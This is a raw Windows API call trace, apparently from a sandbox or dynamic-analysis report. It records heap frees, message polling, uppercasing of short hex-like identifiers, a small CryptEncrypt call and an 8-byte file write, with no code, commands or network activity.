PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0154.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0154.630] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0154.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0154.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0154.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0154.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0154.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0154.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0154.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0154.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0154.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0154.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0154.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0154.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0154.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0154.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0154.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaaba0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0154.631] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0154.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.631] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0154.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.632] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.632] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.632] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.632] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.632] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.632] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0154.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0154.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaad98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0154.632] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71aa8*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71aa8*, pdwDataLen=0x8cef60*=0x8) returned 1 [0154.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.647] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0154.647] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.647] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0154.647] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.647] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.647] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0154.647] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.647] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0154.647] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.648] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.648] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.648] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.648] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0154.648] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0154.648] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0154.648] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0154.648] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0154.648] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.648] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.648] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.648] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.648] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.648] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.648] WriteFile (in: hFile=0x4a4, lpBuffer=0x2a71868*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71868*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0154.649] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.649] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.650] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0154.650] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0154.650] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0154.650] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0154.650] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0154.650] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.650] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0154.651] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.651] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0154.651] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0154.651] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0154.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0154.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa930, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0154.651] CryptDestroyKey (hKey=0x9e21f8) returned 1 [0154.651] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0154.651] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0154.651] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0154.651] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0154.651] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0154.651] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0154.651] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0154.651] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0154.651] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0154.651] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0154.651] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0154.651] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0154.651] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0154.651] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0154.652] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0154.652] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0154.652] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0154.652] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0154.652] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0154.652] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0154.652] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0154.652] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0154.652] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0154.652] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.652] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0154.652] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.652] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0154.652] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.652] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.652] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0154.652] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.652] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0154.652] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.652] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.652] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.652] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.652] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0154.653] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0154.653] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0154.653] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0154.653] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0154.653] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.653] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.653] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0154.653] 